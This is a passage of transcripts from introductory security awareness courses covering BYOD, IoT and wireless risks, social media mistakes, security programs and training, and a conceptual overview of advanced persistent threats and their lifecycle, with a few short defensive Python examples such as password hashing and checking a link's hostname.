smart technology also enables big data. For example, collecting all the information
about an organization's energy usage for lighting and heating over a period of time
and using data analytics to find better ways to manage that usage. And that extends out to sensor data for
companies that use sensors to monitor usage, equipment, machinery, inventory or
some other aspect of the business.
But there are drawbacks to IoT. As the number of connected devices grows, they'll
find their way inside company networks, and this represents a massive increase in
an already growing attack surface. And little to no security in these devices is a
problem that's going to have to be fixed, the sooner the better. There are thousands
of different vendors making connected devices, and everything we've been seeing
is that there's little or no agreement on how the software for these devices should be
created or secured.
In fact, it's pretty much accepted by the security world right now that the software
or firmware for these devices is often cobbled together with little or no attention to
security and even less attention to updating that firmware. And what about this? Do
we know if information is being collected by these devices and sent back to the
device manufacturer? Is there a way to track this? Because in addition to the
potential security hole, there's a bandwidth problem, too. Now fortunately, we can
track this but still it adds an extra layer of complexity.
[Video description begins] Screen title: BYOD and IoT [Video description ends]
So it's a mixed bag of the good and the bad, but here's the truth for you. Like most
technologies, we can't simply ignore BYOD and IoT. In addition to recognizing the ways these phenomena benefit them, organizations also need to be aware of the risks, must implement policies, and must educate management and personnel about those risks and the proper usage of devices.
Wireless Networking Challenges
[Video description begins] Topic title: Wireless Networking Challenges. Your host
for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the challenges surrounding wireless networking and how
wireless networks should be handled on an organizational scale.
[Video description begins] Screen title: Challenges of Wireless Networking [Video
description ends]
Wireless networking has been largely beneficial to organizations, mostly because
employees are no longer tethered to their desks. I really don't think you can
overstate the benefits because technology keeps getting more powerful and more
useful. But there are dangers, so what are they? Wireless networking cut the cord
back in the early 2000s, and that enabled companies in ways they couldn't imagine
before.
Before that we started with desktops and laptops that were physically connected to
the network. And if you took a laptop home or on the road, it was little more than a
word processor or spreadsheet program. You know, lacking connectivity presented limitations. Even with modems it was still fairly clunky. Wireless added greater flexibility in the placement of connected devices and the ability to add new kinds of devices: smartphones, tablets, and, finally, handheld computers.
[Video description begins] A graphic displays to show the evolution of wireless
networking over the years. On the right side of the graphic, the earlier networking
system displays. It consists of workstations - personal computers or laptops - connected to each other via wired networks. On the left side of the graphic, the
present networking system displays. It consists of mobile devices connected via
wireless systems. [Video description ends]
And I'm old enough to remember when quote, unquote handhelds began appearing
in the 90s and even into the early 2000s. And looking back, it was pretty laughable
because those devices were expensive and not terribly useful. But when the devices
became smaller, more powerful, and included wireless transceivers, then things
really started cooking. However, the net result of this growth is an ever-growing
attack surface.
And Wi-Fi devices represent more than just an attack surface, which is a headache for IT professionals. They're more accessible, and they fit in our pockets, so they're susceptible to being lost or stolen. They're rarely configured well, mostly because they work out of the box and navigating a smart phone's settings is like being swarmed by bees. And because they can connect to any wireless signal, they can be hacked.
Guest networks, the kind you find in many wireless hotspots, are troublesome because they usually lack any meaningful security measures to protect your data.
And in a wireless environment that's connected to a corporate network, the
network's data needs to be locked down tightly. There is no room for error here
when a connection to your network can be made by a stranger sitting in the lobby.
[Video description begins] Screen title: Mobile Devices are Risky [Video
description ends]
The devices themselves represent risk. If your organization encourages BYOD,
bring your own device so you can connect at work, then are those devices secured?
Do they take advantage of the lock technology built into modern phones and
tablets?
Most of these devices offer poor security or none at all. It's up to the phone manufacturer, and if they do provide security, you're paying for it. And the cheaper phones usually contain little to no security software, because that's how they keep
the price down. Every vendor is different and even their lines of phones are
different. So having everyone use their own personal devices can be pretty much a
nightmare.
And antivirus software is sometimes overlooked by vendors, although people can
download apps to provide some malware security. Which leads to the question,
what if a device is infected by malware? Can that malware spread if it connects to
the organization's network? It's a question that we have to ask.
[Video description begins] Screen title: Challenges of Wireless Networking [Video
description ends]
So I'll leave you with this. Along with policies for both BYOD and IoT,
organizations have to have a clear policy relating to Wi-Fi, Bluetooth, and mobile
devices, whether they're personal or corporate owned. And I highly recommend
training for personnel to understand the risks specific to mobile connectivity.
Posting on Social Media
[Video description begins] Topic title: Posting on Social Media. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the dangers of posting on social media by providing some
real world examples. Social media has its benefits, but we've seen plenty of
examples of how it
[Video description begins] Screen title: Posting on Social Media [Video
description ends]
can be abused, and misused, creating costly human mistakes. I always remind
people when they post on social media that these posts can be deleted, but they're
never completely removed and the damage may already have been done. They
won't be forgotten. So, in that spirit, let's take a look at some of the well known
social media gaffes made by companies and I'm not going to name names.
In 2016, a major airline retweeted a post, and that post was a promotion by one of its
competitors. Now not the most harmful thing ever done on Twitter, but it caused a
lot of comical responses and was a clear embarrassment for the poster.
In 2014, users posted fears online that the new and slim iPhone 6 might bend if you put it in your pocket and sat down. One of Apple's competitors trolled the company by tweeting a photo of its new phone, noting that theirs was intentionally curved. The problem: at the bottom of the post was the message "via Twitter for iPhone."
In 2018, in response to a Twitter question by a customer, a wireless provider
confirmed that it stored its user passwords in plain text and that customer service reps could see the first four characters. To make matters worse, the wireless
company employee also included the statement that they didn't see the problem
with this practice. The internet blew up over this one and five days later, the
company announced that it would start hashing and salting passwords.
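To make that fix concrete, here is a minimal, hypothetical Python sketch of salting and hashing a password using only the standard library; the salt length and iteration count shown are illustrative assumptions rather than a recommendation from the course.

import hashlib
import hmac
import os

def hash_password(password: str):
    # Generate a random 16-byte salt for this password
    salt = os.urandom(16)
    # Derive a hash with PBKDF2-HMAC-SHA256; 200,000 iterations is an illustrative choice
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest  # store these, never the plain-text password

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    # Constant-time comparison to avoid timing leaks
    return hmac.compare_digest(candidate, digest)

With a scheme like this, a customer service rep could see only an irreversible digest, never the first four characters of anyone's password.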
Again in 2018, a sports equipment manufacturing company sent out an email to
subscribers who participated in the Boston Marathon, with the subject line,
Congrats, you survived the Boston Marathon. While this wasn't done on social
media, people quickly turned to social media with screenshots of the email,
prompting a quick apology by the company.
In 2014, a clothing company shared an image with the hashtag smoke and clouds
on a national holiday. The idea being, enjoy the fireworks. The problem: the image was that of the 1986 explosion of the space shuttle Challenger. The company was
forced to apologize.
And those are just a few examples. You can find plenty of embarrassing or
downright costly social media posts. And my takeaway is that there's no substitute
for a clear and unambiguous policy. But more than that, organizations should
always have a small footprint of trained professionals as their social media posters.
These people are trained not only in social media best practices, but also in
marketing communications and it's best to leave the messaging to the pros.
The Importance of Security Programs
[Video description begins] Topic title: The Importance of Security Programs. Your
host for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of implementing organizational security
programs and why companies that don't have them put themselves at risk.
[Video description begins] Screen title: The Importance of an Information Security
Program [Video description ends]
Every organization needs an information security program. But it's not uncommon
for employees and management to fail to see the need. That's okay. Let's go through it and discuss why. An information security program defines the processes and activities of an organization. It also creates boundaries and protects
assets and information. Ultimately, an information security program ensures that
the organization's risk is as low as possible.
In information security we talk about the CIA Triad as the first thing you learn.
And we're not talking about spies, we're talking about confidentiality, integrity, and
availability. As a triad, each of these elements is as important as the next one, but
each plays a key role in organizational information security.
[Video description begins] A graphic displays. It shows the elements constituting
an interconnected triad, CIA, of information security. CIA stands for
Confidentiality, Integrity, and Availability. [Video description ends]
Confidentiality refers to privacy, keeping information private. Integrity refers to the
soundness or completeness of the data. And availability refers to the need for
constant uptime for that data.
[Video description begins] Screen title: Elements of an Information Security
Program [Video description ends]
An information security program establishes policies and defines risks. It's a
program that evolves over time, doing this by monitoring threats and when
necessary, responding to attacks. Generally, this is how an information security program is established, although every organization is different. So there may be more steps depending on the company. You start by identifying
your sensitive assets, the information that needs to be kept safe and secure. This
should be an extensive and detailed list of everything. And while it's not
uncommon to grade the information on its level of sensitivity, all information
should be considered at some sort of risk.
And you have to understand what the risks are. What happens if this particular kind
of information gets out? How would it harm us and what will it cost? A good
program should define the gatekeepers, the roles and people who are responsible
for the information including its release. And a program always needs to have a
response plan with well-defined steps for what to do in the event of a breach.
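One simple way to reason about those questions is a likelihood-times-impact risk score for each asset. The sketch below is a hypothetical Python illustration of that idea; the asset names, the 1-to-5 scales, and the ratings are assumptions for demonstration, not figures from the course.

# Hypothetical risk scoring sketch: risk = likelihood x impact, each rated 1-5
assets = [
    {"name": "Customer PII database", "likelihood": 3, "impact": 5},
    {"name": "Public marketing site", "likelihood": 4, "impact": 2},
    {"name": "Employee payroll records", "likelihood": 2, "impact": 5},
]

for asset in assets:
    asset["risk"] = asset["likelihood"] * asset["impact"]

# Review and mitigate in order of descending risk score
for asset in sorted(assets, key=lambda a: a["risk"], reverse=True):
    print(f'{asset["name"]}: risk score {asset["risk"]}')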
[Video description begins] Screen title: The Importance of an Information Security
Program [Video description ends]
All this is crucial because you as an organization and as a member of the
organization have responsibilities to different entities. First, to customers and
suppliers, especially if some of the information you are guarding is their
information. Then there is the financial risk represented by a breach, and it's not
cheap. Your organization may have regulatory responsibility even if you didn't
know that you did.
Privacy laws, particularly GDPR, make personal information gathering and
dissemination a risky venture if you're not prepared or don't understand your
responsibility. And in lockstep with that is the legal responsibility which can be
scary if you're required by law to protect certain information. What laws apply to
your company can be contingent on the kind of business you're in.
For example, in addition to general privacy laws, there are laws specific to financial
institutions, healthcare providers, and educational institutions. And all this is to say
that an information security program is designed to protect a company and
minimize its liability by reducing the risks associated with information gathering.
Employee Training, Awareness, and Advocacy
[Video description begins] Topic title: Employee Training, Awareness, and
Advocacy. Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss how employee training, awareness and advocacy should
be implemented. And how it plays a crucial role in the protection of an
organization's information.
[Video description begins] Screen title: Employee Training, Awareness, and
Advocacy [Video description ends]
Employee training sometimes gets overlooked. Or, more commonly, it doesn't cover many important aspects of information security, or doesn't cover them comprehensively enough. But every employee in an organization, from top to bottom, is responsible
for securing sensitive information, no exceptions. Because like a network's attack
surface, the riskiest attack vectors are the weak points. So why should you have
training?
First, knowledge is power. We know that hackers believe this and live by that
mantra, so we have to fight fire with fire. And I've seen this more times than I care
to admit. IT people sort of make the mistake of thinking that everyone in the
organization thinks the way they do. But non-IT personnel are there to do their job
and they don't intuitively know what the risks are. So they have to, and often want to, be informed.
An organizational policy needs to be explained, not just what's in it but why it's
there at all and what might happen if it's not honored. Ultimately employees need
security training because they need to understand the dangers and how they can do
their part to help. What about awareness? This is different from training, which
normally occurs in a single session or a limited number of sessions.
But then employees go back to their work and they don't always keep their antenna
up. It needs to be imparted to them that the dangers are very real, and that people
make mistakes. We all do and hopefully they're not disastrous mistakes, but being
aware of this can help them avoid mistakes. They need to be aware that hackers
won't wait for you to get your game together. They'll attack when you're at your
weakest.
And normally, some of these attacks come through unsuspecting employees who
weren't made aware of the risks. And keep in mind that awareness is contagious. If
you have a culture of awareness in your organization, it can spread. Because people
talk, and hopefully people will have their colleagues' backs, pointing it out when some sort of risky behavior is detected and before it becomes a disaster.
[Video description begins] Screen title: Why Advocacy? [Video description ends]
Advocacy is an extension of awareness because now you're spreading the word. It's
important to share experience and knowledge, things like, hey, did you hear about this email spoofing campaign? No, no I didn't, but I just got this weird email from my own account. Simply put, sharing knowledge makes us all better. It helps
promote the organization too.
You can use that culture of awareness as a selling feature, a way to show your
customers that you're committed to protecting their information. It also builds
confidence, because once again, knowledge is power. So how does an organization
go about implementing training, awareness, and advocacy?
It always begins with a clear and unambiguous policy that lays out in detail what
your goals are and how you intend to get there. Organizations need to identify
leaders from their employee ranks, those who can assist others in becoming aware.
In addition to general training, there should be a train-the-trainer focus because you
really want to have those leaders well armed. And a general training session won't
cut it if you want them to be successful.
Finally, training is an ongoing process because technology changes and hackers
evolve. They become more sophisticated with new tools and methodologies. In
order to be a well armed organization in the war on hacking, we need to stay on top
of things.
Balancing Up-Front Costs vs. Downtime in the Future
[Video description begins] Topic title: Balancing Up-Front Costs vs. Downtime in
the Future. Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of balancing up-front costs versus
downtime in the long run.
[Video description begins] Screen title: Balancing Costs vs. Downtime [Video
description ends]
Balancing the cost of implementing strong security programs with the cost of
downtime shouldn't be a problem for companies. Gartner found that on average, the
cost of network downtime to organizations was $5,600 per minute or $336,000 per
hour. And other Gartner studies have suggested that network downtime ranges
from $140,000 to more than a half million dollars per hour. These figures alone
should make an ironclad case for investing in better security.
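As a quick sanity check on those figures, a per-minute rate converts into per-hour and per-incident costs with simple arithmetic. The short Python sketch below is a hypothetical illustration using the $5,600-per-minute average cited above; the 90-minute outage is an assumed example.

# Rough downtime cost estimate based on the cited Gartner average
cost_per_minute = 5_600                  # dollars per minute of network downtime
cost_per_hour = cost_per_minute * 60
print(f"Cost per hour: ${cost_per_hour:,}")        # $336,000

# Hypothetical example: a 90-minute outage
outage_minutes = 90
print(f"Estimated cost of a {outage_minutes}-minute outage: ${cost_per_minute * outage_minutes:,}")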
And system interruptions can affect your staff and their work effectiveness. Work
interruption can waste up to 6 hours per day. And it could take employees 23
minutes and 15 seconds to recover from interruptions. And interruptions eat up 28
billion people hours a year and cost the US economy a trillion dollars a year. So
what are some of the costs associated with network downtime?
First, wages, a company still has to pay people, even if the company itself isn't
generating revenue due to network failure. A company's reputation, often difficult
to put into hard and fast numbers, but we have plenty of examples of how
reputation has led to lost revenue. There's also lost revenue in the business that's
not being done during a failure.
And the worst case scenario, a failure could result in legal action by customers and
suppliers. There could be penalties and fines if a failure somehow breached
regulations and laws. There's the potential cost of reparations over and above lost
revenues. A company may have to hire outside consultants in order to determine
how this happened and how to avoid it in the future. And failures can indicate that
additional equipment and software may need to be purchased.
[Video description begins] Screen title: Balancing Up-Front Costs vs.
Downtime [Video description ends]
It can be costly to lose a network, even for a brief period of time. It's called disaster
recovery for a reason, it can be disastrous. But companies that know how much
downtime costs them, whether they're in the profit or non-profit space, can plan
better for disaster recovery because they understand the cost of doing nothing.
Convenience vs. Security
[Video description begins] Topic title: Convenience vs. Security. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss how new technology impacts security and how to balance
convenience and security.
[Video description begins] Screen title: Convenience vs. Security [Video
description ends]
I love this quote because it speaks truth. In the security industry, everybody used to
believe that to be secure, something couldn't be convenient. Security and
convenience functioned only in opposition to each other. Making access hard was
the best way to keep information safe. But then we ran up against the human factor,
and that's an important point. Convenience isn't just important because it's
convenient. People need convenience for a variety of reasons, and that's no truer
than in the tech space.
[Video description begins] Screen title: How New Technology Affects
Security [Video description ends]
We know that new technology has a direct and immediate impact on businesses and
there's no doubt that the dramatic increase in the number and kinds of devices that
can connect to a corporate network has expanded the attack surface. But how does
new technology affect people?
[Video description begins] The same diagram depicting the evolution of networking
system displays. But now each side has shaded area, which is labelled as Attack
surface. [Video description ends]
The obvious answer is that new technology makes a user's life easier, making tasks
simpler or more efficient. But on the flip side, new technology makes it easier for
hackers because we're growing the attack surface and they're making new and
better hacking tools. In the middle are the security professionals.
And yes, it makes their lives harder because they need to cater to their users and
help them use the technology, while at the same time remaining vigilant in
protecting the network. And this has another impact on management, because they
have to understand the issues, the employees, the risks, and what IT needs in order
to be successful.
[Video description begins] Screen title: Convenience vs. Security [Video
description ends]
As Bruce Schneier points out, changes in technology affect both the attacker and
the users. New defensive technologies can decrease what he calls the scope of defection, that is, what attackers can get away with, while attackers use new technologies to increase that scope. This is an ongoing issue, and the importance of understanding this delicate balance cannot be overstated. So how do we
balance that growth with convenience and make it easier for employees to work in
a secure environment? It helps to understand some basic concepts and work out
from there.
First, owners and IT administrators need to come to grips with the premise that
convenience is not a bad thing. All the while security has to be honored. We have
to understand that security is not bad. And we need to impart that to management
and employees. We can find a balance if all parties are on the same page. And often
that page is where we start with policy, which guides everything in the ultimate
goal of protecting the organization and the people who work for it.
Exercise: Explain How to Protect Your Information
[Video description begins] Topic title: Exercise: Explain How to Protect Your
Information. Your host for this session is Jamie Campbell. [Video description ends]
Now that you've learned about protecting your information, it's time to put some of
that knowledge to work. In this exercise, you'll explain how to protect your
information.
You'll explain best practices of email safety. You'll explain how to protect sensitive
data. You'll explain when to share sensitive data, explain the drawbacks of BYOD,
and list the three legs of the CIA triad.
At this point, you can pause this video, and answer these questions. When you're
done, resume the video to see how I would answer them.
Okay, let's answer these questions. It's okay if you didn't answer them exactly the
same way.
[Video description begins] Solution [Video description ends]
First, explain best practices of email safety. Don't open attachments, think before
you click, familiarize yourself with email spoofing, hover over links to view the
actual URL, but don't click them. Don't use personal email for business. Use your
malware scanner. Also, treat your email passwords like every other password, and
keep them secure. Check to see if you've been pwned. Don't enable macros. Learn
how to recognize scams. Understand how URLs work, and protect your email
addresses.
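One of those habits, understanding how URLs work, can be illustrated with a small sketch. The following hypothetical Python example pulls the hostname out of a link so it can be compared with the domain you expect; the URLs shown are made-up examples, not real sites.

from urllib.parse import urlparse

# Hypothetical links you might hover over in an email
links = [
    "https://www.example-bank.com/login",
    "https://www.example-bank.com.attacker.example/login",  # deceptive lookalike
]

for link in links:
    hostname = urlparse(link).hostname
    # The full hostname is what matters, not what the link text appears to say
    matches = hostname == "www.example-bank.com"
    print(f"{link} -> hostname: {hostname}, matches expected domain: {matches}")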
Next, explain how to protect sensitive data. First, use encryption. Store your
information on devices that can be locked. Never share sensitive information over
public networks. Only share that information over secure networks. And for the
most sensitive information, never store it on removable devices.
Next, explain when to share sensitive data. You should only share sensitive data
when you trust the source, when you trust the delivery method, and when you trust
the party you're sharing it with.
Next, explain the drawbacks of BYOD. First, secure networks are only as good as
their weakest point, and so BYOD represents a security risk. It adds vectors
exponentially, and so BYOD increases the attack surface.
Finally, list the three legs of the CIA triad. The three legs of the CIA triad are
confidentiality, integrity, and availability. I hope you found this exercise helpful.
Information Security: APT Defenses
In this 13-video course, discover key Advanced Persistent Threat (APT), concepts
such as defense and best practices. Explore common APT attacks and mitigation
techniques that can be used, APT tools, and how to create effective APT checklists.
You will begin with an introduction to APT and its purpose, then look at the steps
of the APT lifecycle. Learners will examine motives behind an APT and probable
targets, and learn to identify APT defense best practices. Next, you will explore
methods that can be used to strengthen APT defenses, and then recall the method(s)
to deal with APTs. You will then take a look at the Equation Group, an APT group, and its
involvement in various cyber crimes. Another tutorial examines the key tools that
are used when conducting an APT. Define risk assessment processes that can help
you protect your assets. In the final tutorial in this course, you will be asked to
identify key points for creating an effective checklist to address APT attacks.
Course Overview
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, my name is Ashish Chugh.
[Video description begins] Your host for this session is Ashish Chugh. He is an IT
consultant. [Video description ends]
I have more than 25 years of experience in IT infrastructure operations, software
development, cybersecurity, and e-learning. In the past, I have worked under
different capacities in the IT industry. I have worked as a quality assurance team
leader, technical specialist, IT operations manager, and delivery head for software
development.
Along with this, I have also worked as a cybersecurity consultant. I have a bachelor's degree in psychology and a diploma in system management. My areas of expertise are IT operations and process management. I have various certifications, including Certified Network Defender, Certified Ethical Hacker, and Computer Hacking Forensic Investigator. Other than these certifications, I also have a few certifications from Microsoft, which are MCSE, MCSA, and MCP. I am also a Certified Lotus Professional.
In this course, we will understand the concept of APT defenses. We will also be
familiarized with APT defenses best practices. And we'll also look at one of the
APT groups and understand the tools they use in their attacks. We will also learn
about mitigating APT threats.
Later in the course, we will also learn how to explain the concept of APT to end users and give them various tools to handle APT threats. We will also learn about the techniques to handle APT attacks. And finally, we'll be able to understand a basic checklist for addressing APT attacks.
Advanced Persistent Threat Introduction
[Video description begins] Topic title: Advanced Persistent Threat Introduction.
Your host for this session is Ashish Chugh. [Video description ends]
An advanced persistent threat is a threat posed by well-funded and highly skilled hackers. Advanced persistent threat is made up of three components: advanced, persistent, and threat. What we have to understand is that these guys who are part of the advanced persistent threat, also known as an APT, establish their presence deeply within the organization and are very hard to trace. They continue to move deeper within the organization's systems to find and steal the most valuable information. Going
forward, we will look at what these three components are, advanced, persistent, and
threat.
When you talk about advanced, the APT group uses a higher level of sophistication, which means the tools they use and the kind of skills they have are very, very sophisticated, and it is very hard to trace them and very hard to stop them. They use highly advanced methods of attack, which means some of these methods are virtually unknown and undetectable. This is because they do not use any off-the-shelf applications, something like Metasploit.
Rather, these guys will come up with innovative methods of attacking the target.
They have expert skills and resources. These guys are not novices or newbies in the field. They are highly experienced, highly skilled, and very resourceful. This is because not only do they have the skill set, but they also have a high level of financial funding.
They use sophisticated and custom tools. These guys do not use any off-the-shelf
tools. They will come up with their own custom tools, which means most of these
guys know how to design a tool. This is because their tools are meant for a specific
purpose. These are not general tools that they use to attack a target. Because they
have a specific motive, this is the reason their tools are customized to fulfil their
needs and successfully attack the target.
Now let's talk about being persistent. In APT threats, the attackers gain access to a
network or a system and remain undetected for a long period of time. The key
intention here is to fulfill their goals and meet their objectives.
One of the key objectives that they have is to extract data but not cause any damage. The reason they do not cause any damage is that damage can attract the attention of the IT team or the security team within the organization. Therefore, they continue
to pursue their goals and they will remain within the system or the network till the
goals are met.
Once the goals are met, they will quietly move out, removing all the traces that could lead back to them. So they intend to stay in the target for the long term, and the reason is that they want to fulfill their goal. Their goals are pretty complicated; for example, they want to steal data and extract a lot of confidential information.
And sometimes this is not easy because of the security controls that have been
implemented or there is defense in depth. Therefore, they might take a little longer,
and for this they have to stay a little longer than the usual time.
Now let's talk about threats. APTs typically target large organizations or enterprises that have intellectual property, secrets, designs, or critical business information, which is very valuable. APTs can also target political organizations for political motives. They can also spy on governments and track the activities of high-level individuals. Some even target the critical infrastructure of nation states, such as power grids or even nuclear capabilities.
This means these APTs are motivated, skilled, and persistent. Motivated means they have a specific target in mind; skilled means they use their skill set to achieve the motive; and persistent means they do not stop until their motives are met. They use coordinated human actions. This means they typically work in a
hierarchical form. There is a division of tasks. So every individual is assigned a
specific set of activities.
It is not the case that one individual is going to conduct the complete attack. There are
individuals who are given specific activities, and these activities are given to the
individual so that one person is not overloaded and one person does not need to
have the complete knowledge of the attack. Specific individuals do specific
activities, and then the entire attack is coordinated in this manner.
They have the capability and the intent. This is because these guys could be nation states; these guys could be anybody who is well funded to conduct this kind of attack. So not only do they have the capability, but they also have the intent.
Remember, APTs do not work without an intent. If there is no intent, there is no
attack conducted by the APTs.
APTs are resourceful and well funded. They need to have quite a bit of
infrastructure to conduct such attacks, which go very deep into organizations and systems, and they need to have a lot of resources. So for instance, they develop their own custom tools. The custom tools cannot be developed if resources are not available, and resources can only be made available if they are well funded. So there are countries and organizations who often fund the APTs to
conduct a large-level attack.
Let's now look at some of the APT actors. When you talk about nation states, these
guys are well funded to steal intellectual property and even defense secrets. They are focused on hacking into military and diplomatic data and have now even started to attack industry.
The next one on the list is the organized crime group, which is mostly after money. They are mainly focused on commercial or social goals. Then, hacktivists have a political or a social reason. Then there is another one, known as the corporate espionage group, which goes after competitors to gain critical information. [Video
description begins] The following information is displayed on screen: Corporate
espionage actors. [Video description ends] And these are mostly sponsored by one
corporate to conduct an espionage attack on the competitor.
Then you have terrorists, who have a political or specific agenda and are often funded by a country or a well-funded group of people. Let's now look at some of the characteristics of APTs. They use sophisticated tools and techniques. As we discussed earlier, these guys design their own custom tools, which are highly sophisticated and not available to the public. And the group basically owns these tools. How the tools work and the techniques behind them are known only to the APT group.
They use social engineering. Social engineering is the base of most of the attacks.
Whether it's by APT or any other hacker, social engineering is used as the first
method to get some basic information about the target. And then from there
onwards, hackers or the APT groups move on and conduct the attack.
APTs do not work without an objective. Remember, these are not some general
hackers who are out there to just break into a system or a network and steal
information. APTs have a very well-defined objective, and they do not go after just anybody. They will have a specific target, and they have a specific motive or objective against that target.
Because APTs need a lot of money and resources, they are well funded by their sponsors. APT groups generally do not go out and start breaking into networks or systems on their own. They are funded, and they are asked to do a specific job.
They are well organized in the form of a hierarchy. Like we discussed in the past,
there is a specific hierarchy that is formed. There is one guy who does one set of jobs, and there is another guy who is doing another set of jobs. And at the end, they all
combine their actions to conduct this attack.
Let's look at some more characteristics of APTs. They are low-profile attacks,
which means they are not there to cause damage. They quietly move in, take what
they want or do what they have to do, and then they quietly move out. So they
remain very low profile. The benefit of keeping it a low-profile attack is that they
go undetected. They are extremely stealthy and can remain undetected for as long as six months.
One cybersecurity report stated that they stay undetected for about 153 days, which is about five months. That's a very long time to do what you want to do within a network, which means you can do a lot of activities: you can do privilege escalation, you can steal data, you can modify data. But one of the main things about APTs is that they do not do anything that brings them into the light. So they will do things which are undetected, which are low profile, and which do not gain the attention of the IT security team.
They do not cause any downtime. As explained in the previous point, the idea is not to gain attention. The idea is to fulfill their motive, to stay low profile, take what you want, and quietly move out. And of course, before you move out,
you remove all the traces that can lead back to you.
They do not follow a hit-and-run method. [Video description begins] The following
information is displayed on screen: Do not usually cause downtime to avoid
detection. [Video description ends] This is what the hackers do. They come, they
cause damage, and then they run away. APTs do not do that. The idea is to remain
undetected, and therefore, they do not use any kind of hit-and-run method. The hit-and-run method basically means that you come, cause damage, gain
everybody's attention, or become noticeable that you are in the network, and then
you try and move out. But APTs do not do that; they will stay very low profile.
Let's now look at some of the well-known APT groups. And these groups are the
most dangerous groups that exist today. Among the topmost groups are the Equation Group – we will talk about this group later on – Fancy Bear, Lazarus, and Periscope. What we have to understand is that each group has its own set of tools and its own method of working, and they generally do not use each other's tools unless or until they shake hands and come together to mount a single attack.
APT Lifecycle
[Video description begins] Topic title: APT Lifecycle. Your host for this session is
Ashish Chugh. [Video description ends]
We will now look at the APT lifecycle. What we have to understand is that the execution of an APT is not really different from any other type of security attack. You would pretty much follow the same steps; however, the methodology does differ. In a normal attack, the hacker would perform the attack, take whatever is needed, and leave in a hurry. However, APTs do not really follow this methodology. They tend to
stay longer and do not cause any kind of damage while being in the system, which
means that they can remain undetected for a very, very long time.
In most cases, APT lifecycles are defined differently by different companies. However, there are typically four steps. There is a preparation step, there is an initial intrusion, then there are multiple steps that can follow which run in parallel, and finally there is a cleanup.
Let's look at the typical APT lifecycle.
[Video description begins] A diagram displays. It shows eight boxes. The first box
is labeled "Reconnaissance." The second box is labeled "Initial intrusion to the
system or network." The third box is labeled "Installing the backdoor." The fourth
box is labeled "Obtain user credentials." The fifth box is labeled "Installing tools
for control." The sixth box is labeled "Perform privilege escalation." The seventh
box is labeled "Perform lateral movement." And the eighth box is labeled
"Maintain persistence." A line connects all eight boxes. [Video description ends]
In the most generic sense, if you want to know how an APT works and what its lifecycle is, there are two steps that are going to be very crucial. One is the preparation phase and then the initial intrusion phase. These are the mandatory steps that need
to be performed in a sequence. Beyond this, multiple steps can run in parallel; so
for instance, installing the backdoor. Once that is done, then you have privilege
escalation, lateral movement, installing tools for control, obtain other user
credentials.
Several of these things can run in parallel. For example, if you talk about persistence and access manipulation, both of these can happen in parallel along with lateral movement. And once the rest of the APT lifecycle is completed, there is one more step that gets performed, the final step, which is known as cleanup.
Let's look at the APT lifecycle defined by Intel. So they largely break this into five
different sections. So there is intelligence gathering, which includes conduct
background research. Then initial exploitation, which includes execute initial
attack, establish foothold. Then they have a third phase which is known as
command and control. So that is enable persistence, conduct enterprise
reconnaissance. And then comes the fourth phase, where they perform privilege escalation. This includes moving laterally to new systems and escalating privileges.
Then, finally, comes the data extraction phase, which is also known as data exfiltration.
That includes gather and encrypt data of interest and extract data from the victim
system. [Video description begins] The data exfiltration section includes
exfiltrating data from victim system. [Video description ends] And finally, then
they maintain persistence within the system or the network.
Let's look at the APT lifecycle defined by Varonis. Now, Varonis defines a total of 12 steps within the APT lifecycle. They start with define target, find and organize accomplices, build or acquire tools, and research target. So basically, if you look at it, in the other lifecycles that we have seen, the generic one and Intel's, the first three steps (define target, find and organize accomplices, build or acquire tools) did not exist. They started from research target, basically doing the initial research about the target and getting to know what it is about.
Then the fifth is test for detection. You run various tools to find whether there are live systems on the network and whether there are ways to detect open ports or services. Then you do the deployment; you deploy various malware or spyware onto the systems. That leads you to the initial intrusion. And once the initial intrusion is done, you create an outbound connection. This is because you
want to extract the data and send it outside.
Then you expand access and obtain credentials. Finally, you strengthen your
foothold within the systems on the network. You extract data and then you cover
tracks and remain undetected. [Video description begins] According to the slide,
the following is the eleventh step in the APT lifecycle: Exfiltrate data. [Video
description ends] Now this completes the APT lifecycle defined by Varonis.
Now if you go back and check how Intel defined it and how Varonis defined it,
both are different. There are a lot of steps that Varonis defines which Intel does not, and both Intel and Varonis differ to some extent from the generic APT lifecycle.
Now let's look at the APT lifecycle defined by Secvibe. They have a 10-phase
process. It starts with research, initial attack, establish foothold, enable persistence,
domain/enterprise resource access, then lateral expansion, privilege escalation,
gathering specific set of data, encrypting and extracting data, and maintaining
persistence. [Video description begins] According to the slide, the first and the
ninth phases in the APT lifecycle are "Research and reconnaissance" and "Encrypt
and exfiltrate data," respectively. [Video description ends]
Now this entire lifecycle is very concise and crisp compared to the Intel and Varonis processes. However, we cannot say that any one of these processes is correct or
incorrect. It is up to the organization to define what an APT lifecycle is. For every
organization, depending on their infrastructure, depending on their processes and
policies, they might define APT lifecycle to be slightly different than the others.
Motives and Targets of an APT
[Video description begins] Topic title: Motives and Targets of an APT. Your host
for this session is Ashish Chugh. [Video description ends]
Let's now discuss APT motivations. Remember, APTs do not work without
an objective or motivation. Some of these motivations that APTs have are, first one
is military. When you talk about military, the APT group is typically hired by a
nation or a group to attack the military infrastructure of another nation. Next comes
political. There are obvious political reasons why these attacks are carried out by
the APT group. Again, they are hired by one political group or a nation or another
set of people to carry out this attack.
Then comes corporate espionage. This is, for obvious reasons, about stealing the intellectual property of a corporation. And this attack is typically funded by either a group of people or another corporation. Then comes hacktivism.
Hacktivism could be done for political or social reasons. This type of APT could be
carried out by hiring the APT group. Then comes the financial theft. This type of
APT is typically conducted on banks and financial organizations.
Let's look at some more APT motivations. Then you have cyber warfare. This is a new direction for military warfare. In this type of APT, no blood is shed, but a lot of damage is done to the opponent. China, in 1995, came up with a cyber warfare policy. The United States of America created a policy in 2010. Several countries have now defined a cyber warfare policy. Then comes sabotage. This is obviously done for the purpose of destroying an organization or even the infrastructure of
another country.
Then comes the intellectual property theft. This is done to steal intellectual property
